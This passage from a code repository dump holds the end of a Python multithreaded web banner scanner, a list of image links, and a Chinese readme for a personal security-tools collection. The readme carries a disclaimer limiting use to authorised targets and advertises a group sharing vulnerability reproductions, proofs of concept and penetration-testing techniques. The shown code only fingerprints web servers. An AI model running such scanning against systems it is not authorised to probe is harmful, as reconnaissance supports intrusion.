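        exit(1)
    web_banner_bot = My_web_banner_scan(queue=URL_QUEUE, url_file=args.file, csvfile=args.outputfile, timeout=timeout,
                                        saveheadbody=args.saveheadbody, verify=not args.no_verify)
    web_banner_bot.get_url_from_file(args.file)
    for i in range(Thread_maxnum):
        thread = threading.Thread(target=web_banner_bot.web_banner)
        thread.start()
        thread_list.append(thread)
    for thread in thread_list:
        thread.join()

    # os.getcwd() + name dropped the path separator; join() builds a real path.
    print("[+] Output save in", os.path.join(os.getcwd(), args.outputfile))
-------------------------------------------------------------------------------- /images/640-16432009920046.webp: --------------------------------------------------------------------------------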
https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/640-16432009920046.webp -------------------------------------------------------------------------------- /images/640-16432009920047.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/640-16432009920047.webp -------------------------------------------------------------------------------- /images/640-16432009920048.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/640-16432009920048.webp -------------------------------------------------------------------------------- /images/Z2O安全攻防交流群群聊qq二维码.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/Z2O安全攻防交流群群聊qq二维码.png -------------------------------------------------------------------------------- /images/image-20220427111016139.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/image-20220427111016139.png -------------------------------------------------------------------------------- /images/公众号.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/公众号.jpg -------------------------------------------------------------------------------- /images/微信图片_20220427110850.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/images/微信图片_20220427110850.jpg 
-------------------------------------------------------------------------------- /readme.md: --------------------------------------------------------------------------------
# Mytools

自己工作中编写的各种脚本,**欢迎star**⭐

从名字基本可以判断出类型,多线程的都使用了生产者消费者模型,对于想开发工具的小伙伴可以提供一个参考。



**免责声明:**

利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

仅供对已授权的目标进行测试,对未授权目标的测试作者不承担责任,均由使用者本人自行承担。

## 一起交流

感兴趣的可以关注 **Z2O安全攻防** 公众号回复“**加群**”,添加Z2OBot 小K自动拉你加入**Z2O安全攻防交流群**分享更多好东西。

![图片](images/640-16432009920048.webp)

![公众号](images/公众号.jpg)

![Z2O安全攻防交流群群聊qq二维码](images/Z2O安全攻防交流群群聊qq二维码.png)

团队建立了知识星球,不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试骚操作。感兴趣的可以加一下。

![image-20220427111016139](images/image-20220427111016139.png)



![图片](images/640-16432009920046.webp)

![图片](images/640-16432009920047.webp)

![微信图片_20220427110850](images/微信图片_20220427110850.jpg)





欢迎⭐ 😁
--------------------------------------------------------------------------------